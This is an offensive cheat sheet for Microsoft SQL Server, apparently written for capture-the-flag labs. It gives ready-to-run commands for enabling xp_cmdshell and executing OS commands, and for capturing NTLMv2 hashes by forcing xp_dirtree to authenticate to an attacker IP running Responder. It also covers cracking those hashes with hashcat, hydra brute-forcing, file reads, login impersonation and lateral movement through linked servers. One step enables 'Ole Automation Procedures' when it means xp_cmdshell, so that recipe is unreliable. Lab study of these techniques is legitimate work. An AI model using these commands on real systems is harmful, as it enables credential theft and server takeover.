Connect to MSSQL
To connect to MSSQL from Linux host.
mssqlclient.py {DOMAIN}/{USER}:{PASSWORD}@{IP}
mssqlclient.py {DOMAIN}/{USER}:{PASSWORD}@{IP} -windows-auth
List Databases
To list databases in MSSQL.
SELECT name FROM master.dbo.sysdatabases
Using mssqlclient.py
enum_db
List Tables
To list tables in MSSQL.
select table_name from {DB_NAME}.INFORMATION_SCHEMA.TABLES;
List Table Content
To content in a table in MSSQL.
select * from {TABLE_NAME};
Change Database
To change database in MSSQL.
use {DB_NAME}
Command Shell
In Microsoft SQL Server, xp_cmdshell is a built-in extended stored procedure that allows executing operating system commands from within SQL Server. This feature is disabled by default, but we can try to enable it and execute commands.
sp_configure 'show advanced options', 1
RECONFIGURE
sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
xp_cmdshell "whoami"
The same can also be done using mssqlclient.py
enable_xp_cmdshell
xp_cmdshell "whoami"
Hash Capture
We can try to use responder to to capture the NTLMv2 hash sent from a request to an invalid share using the mssqlsvc account. We can then attempt to crack the hash using hashcat.
Step 1: Start responder
sudo responder -I tun0
Step 2: Have the MSSQL server authenticate to our responser SMB server.
SQL (htbdbuser guest@master)> EXEC master..xp_dirtree '\\10.10.15.209\share'
Step 3: Crack the NTLMv2 hash using hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt -o cracked.txt
Password Bruteforce
We can use hydra to bruteforce passwords.
hydra -l shelled -P /usr/share/wordlist/rockyou.txt {IP} mssql
File Read
By default, MSSQL allows file read on any file in the operating system to which the account has read access. We can use the following SQL query:
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
Impersonate
SQL Server has a special permission, named IMPERSONATE, that allows the executing user to take on the permissions of another user or login until the context is reset or the session ends.
Step 1: Check which users we can impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
Step 2: Impersonate user
EXECUTE AS LOGIN = 'josh'
Step 3: Verify we are impersonating user
SELECT SYSTEM_USER
Step 4: Check if we have sysadmin privileges (If returned value is 0, then we do not have sysadmin privileges)
SELECT IS_SRVROLEMEMBER('sysadmin')
Linked Database
MSSQL has a configuration option called linked servers. f we manage to gain access to a SQL Server with a linked server configured, we may be able to move laterally to that database server.
Step 1: Check if there are any linked databases (If the isremote value is 0, then it is a linked server)
SQL (josh guest@master)> SELECT srvname, isremote FROM sysservers
srvname isremote
--------------------- --------
WINSRV02\SQLEXPRESS 1
LOCAL.TEST.LINKED.SRV 0
Step 2: The EXECUTE statement can be used to send pass-through commands to linked servers. We add our command between parenthesis and specify the linked server between square brackets ([ ]).
SQL (josh guest@master)> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [LOCAL.TEST.LINKED.SRV]
------------------------------ ------------------------------ ------------------------------ -----------
DESKTOP-0L9D4KA\LOCAL.TEST.LINKED.SRV Microsoft SQL Server 2019 (RTM sa_remote 1
Step 3: If we have sysadmin privileges in the linked database, then we can enable and execute xp_cmdshell on that database.
SQL (josh guest@master)> EXECUTE('xp_cmdshell "whoami"') AT [LOCAL.TEST.LINKED.SRV]
-------------------
nt authoritysystem